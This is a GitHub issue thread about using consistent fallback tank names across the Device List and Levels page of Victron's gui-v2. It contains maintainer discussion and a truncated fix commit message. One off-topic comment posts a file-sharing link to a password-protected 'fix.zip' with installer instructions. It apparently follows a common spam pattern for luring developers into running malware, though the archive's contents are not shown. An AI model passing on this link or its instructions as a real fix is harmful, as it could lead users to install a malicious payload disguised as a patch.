victronenergy/gui-v2 #1430: Use consistent fallback tank names across Device List and Levels page

blammit, 2024-08-29:
In the Device List, if a tank does not have a `/CustomName` set, the tank is referred to using the tank's fluid type and device instance (e.g. "Fuel tank (343)"). The Levels page does not do this, and instead shows the `/ProductName` as a fallback if there is no custom name. 

gui-v2 should use the Device List implementation for both cases, as this is based on [some specific handling in gui-v1](https://github.com/victronenergy/gui/commit/7a0c5b9b2d9b9040764ed6d7ceb58772eb222c60) to ensure the tank description aligns with the one used for tank alarms.

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

blammit, 2024-08-29:
This change would also allow BaseDevice::description to be used, as it was really only used for the tank case in the Device List.

And by extension, AggregateDeviceModel could then cache the device name, instead of the device description.

kwindrem, 2024-08-29:
A far better solution would be to insure all tanks (and temps) have a /CustomName that can be filled in by the installer even if the external device does not support it.

blammit, 2024-08-30:
Yes, agreed, though that would have to be supported at a level beneath the gui-v2 layer.

commit 1fb25bf0 (2024-09-01): Use consistent fallback tank names across Device List and Levels page

In the Device List, if a tank does not have a `/CustomName` set, the
tank is referred to using the tank's fluid type and device instance
(e.g. "Fuel tank (343)"). Use the same naming in the Levels page so
that a tank will have the same name in the Device List and the Levels
page.

Effectively this means the tank 'name' property can be used as the
only way to provide a text description of the tank, instead of using
both a 'name' and a 'description'.

The workaround for creating a user-friendly name for Generic Tank
Sensor in [... cut]
closed 2024-09-01 by blammit